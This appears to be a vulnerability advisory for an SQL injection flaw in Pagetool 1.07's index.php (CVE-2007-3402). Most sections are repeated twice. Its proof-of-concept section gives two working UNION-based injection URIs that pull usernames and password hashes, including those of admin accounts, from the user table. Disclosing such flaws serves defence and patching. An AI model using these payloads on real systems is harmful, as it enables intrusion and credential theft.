Pagetool Index.PHP SQL Injection Vulnerability
BID:24640
Info
Pagetool Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 24640 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3402 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 25 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | Katatafish is credited with the discovery of this vulnerability. |
| Vulnerable: |
Pagetool Pagetool 1.07 |
| Not Vulnerable: | |
Discussion
Pagetool Index.PHP SQL Injection Vulnerability
Pagetool is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pagetool 1.07 is vulnerable to this issue; other versions may also be vulnerable.
Pagetool is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pagetool 1.07 is vulnerable to this issue; other versions may also be vulnerable.
Exploit / POC
Pagetool Index.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
A sample URI has been provided:
http://www.example.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1
http://www.example.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
Attackers can use a browser to exploit this issue.
A sample URI has been provided:
http://www.example.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1
http://www.example.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
Solution / Fix
Pagetool Index.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Pagetool Index.PHP SQL Injection Vulnerability
References:
References: